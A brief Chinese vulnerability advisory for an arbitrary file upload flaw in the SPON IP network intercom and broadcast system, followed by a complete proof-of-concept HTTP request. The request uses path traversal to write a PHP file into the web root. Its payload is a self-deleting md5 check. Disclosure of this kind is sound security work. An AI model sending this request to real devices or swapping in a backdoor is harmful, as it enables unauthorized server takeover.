漏洞描述
世邦通信SPON-IP网络对讲广播系统是一款基于IP网络的高效音频传输解决方案,适用于商场、学校和医院等公共场所。世邦通信SPON-IP网络对讲广播系统videobacktrackpush.php存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。
世邦通信SPON-IP网络对讲广播系统 /php/videobacktrackpush.php 文件上传漏洞
PoC代码
POST /php/videobacktrackpush.php HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/8.54.(X11; Linux i686; fur-IT) Presto/2.9.160 Version/12.00
jsondata[caller]=1&jsondata[callee]=../../../../../../ICPAS/Wnmp/WWW&jsondata[videoname]=IEh1al.php&jsondata[videocontent]=PD9waHAgZWNobyBtZDUoMTAwODY2Nik7dW5saW5rKF9fRklMRV9fKTs/Pg%3d%3d